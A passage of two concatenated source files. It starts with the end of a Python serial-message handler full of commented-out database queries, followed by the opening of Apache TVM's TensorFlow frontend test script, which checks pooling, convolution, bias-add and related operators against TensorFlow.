#thesensors = db.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4])
#db.session.commit()
#create dataeven object and return
# if self.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4]).count()>0:
#db.session.commit()
# thesensor = self.session.query(db.Sensor).filter(db.Sensor.device_id==self.device.id).filter(db.Sensor.pin==themessage[1:4]).all()[0]
#db.session.commit()
# outmessage = db.DataEvent(device = self.device, sensor = thesensor, value =int(themessage[3:6]))
#db.session.commit()
# if self.output:
# print("created data event")
#for somesensor in self.sensors:
#print(somesensor.pin)
#if themessage[1:4] == somesensor.pin:
# outmessage = themessage[0]+str(somesensor.id).zfill(3) +themessage[4:]
outmessage = themessage[0]+str(self.device_id).zfill(3)+themessage[1:]
print("sent to loop" + outmessage)
return outmessage
def __del__(self):
#if self.output:
# self.f.close()
pass
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.asnumpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].asnumpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
""" Generic function to compile on relay and execute on tvm """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
""" Generic function to execute tensorflow """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
# since the names from tensorflow and relay runs are not exactly same,
# first len(tf_output) will be compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
""" One iteration of pool operation with given shapes and attributes """
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
""" Pooling with dynamic height and width dimensions. """
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
""" Pooling """
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution transpose with given shapes and attributes """
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
""" One iteration of biasadd with given shapes and attributes """
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
